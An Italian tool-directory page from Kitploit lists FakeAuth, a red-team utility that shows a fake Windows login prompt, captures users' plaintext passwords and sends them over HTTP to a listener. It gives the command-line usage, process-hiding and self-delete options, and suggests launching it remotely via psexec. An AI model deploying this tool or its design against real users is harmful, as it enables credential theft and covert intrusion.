Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
FakeAuth — Crea un finto prompt di autenticazione per catturare le password in chiaro degli utenti | Kitploit
Strumenti/GitHubGitHub/atn1ght/fakeauth
Attacchi alle PasswordPhishingIngegneria SocialeRed Teaming
GitHubatn1ght/fakeauth

FakeAuth

Crea un finto prompt di autenticazione per catturare le password in chiaro degli utenti

Vedi Repository
35 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

FakeAuth

FakeAuth è uno strumento che richiede le credenziali dell'utente e le esfiltra tramite protocollo HTTP.

Ispirato dai seguenti progetti:

  1. PICKL3 di hlldz https://github.com/hlldz/pickl3

Aspettati codice sporco e qualche bug ;)

Installazione

Nessun requisito speciale

Utilizzo v1.01

root@kitploit:~
Usage:   FakeAuth.exe <hide> <mode> <type> <count> <title> <message> <listener>
Example: FakeAuth.exe 1 1 1 10 window_title enter_creds 10.0.0.0:80\n
hide     (integer) -> Hide Process in Taskmgr by WinAPI-Hook (0,1 - requires FakeAuth.dll) 
mode     (integer) -> Self-Delete at process stop (0,1) - .dll only possible if taskmgr closed!
type     (integer) -> Prompt Style (1,2)
count    (long)    -> How many prompts after invalid Credentials (0,1,2,..,n 0=unlimited)
title    (string)  -> Prompt title (visible in type=1 only)
message  (string)  -> Window message
listener (string)  -> HTTP exfiltration listener (10.0.0.0:80), if not specified print stdout

Il modo migliore per usarlo è avviarlo su macchine remote in una sessione utente. (psexec o altri helper)

Contatti

@atn1ght1 Twitter

Scarica lo strumento